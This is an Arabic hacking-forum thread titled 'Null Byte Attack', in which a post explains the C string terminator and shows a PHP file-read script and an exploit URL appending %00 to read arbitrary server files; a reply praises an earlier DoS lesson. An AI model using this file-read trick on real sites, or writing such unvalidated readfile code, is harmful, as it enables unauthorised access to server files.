التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-28-2013, 12:07 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي Null Byte Attack


السلام عليكم ورحمة الله تعالى وبركاته.
المهم... بالنسبه للمطلعين على البرمجه في السي ..

Null Byte = '\0'

وهو يكون في نهاية مصفوفات الحروف

مثلا :

كود PHP:
char C[]="nor15din"
في الذاكرة يتم تسجيل اسمي على الشكل التالي :

كود PHP:
'n' 'o' 'r' '1' '5' 'd' 'i' 'n' '\0' 
وبالتالي \0 ترمز الى نهاية المصفوفة ...

سنتطرق الى هذه الدروس في دورة السي، المهم

نفترض عندنا سكربت يمكن من تحميل الصور فقط من السيرفر..

كود PHP:
readfile($_GET["image"] . ".jpg"); 
الاستغلال :

كود PHP:
http://www.site.com/download.php?image=file.txt%00 
ينفذ الامر هكذا في السيرفر :

كود PHP:
readfile("file.txt\0.jpg"); 
والسلام عليكم..


Null Byte Attack

   

رد مع اقتباس
قديم 03-21-2018, 07:51 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mimo-dz
 

 

 
إحصائية العضو








mimo-dz غير متواجد حالياً

إرسال رسالة عبر Skype إلى mimo-dz

 

 

إحصائية الترشيح

عدد النقاط : 10
mimo-dz is on a distinguished road

افتراضي رد: Null Byte Attack


شكرا اخي نور الدين انت فاكر درسك اللعبة التي تدعم الدوس في اختراق السيرفرات كانت روعة مشكوووور

التوقيع

تعشق الموت لكي لا تعشقنا الحياة
فدخلت مدارس الهاكر لتعاقب الحقراء
فتعلمت فنون الهاكر بكل أنواع الجنون
تعلمت حين تقول نعم ... فقط من أجل العيون
الهاكر حرب ... وكل من قادها يا عمرى مجنون
لا تسأل من تكون ؟
انت من كتب دستور الهاكر ... وأنت من وضع له قانون

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:14 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0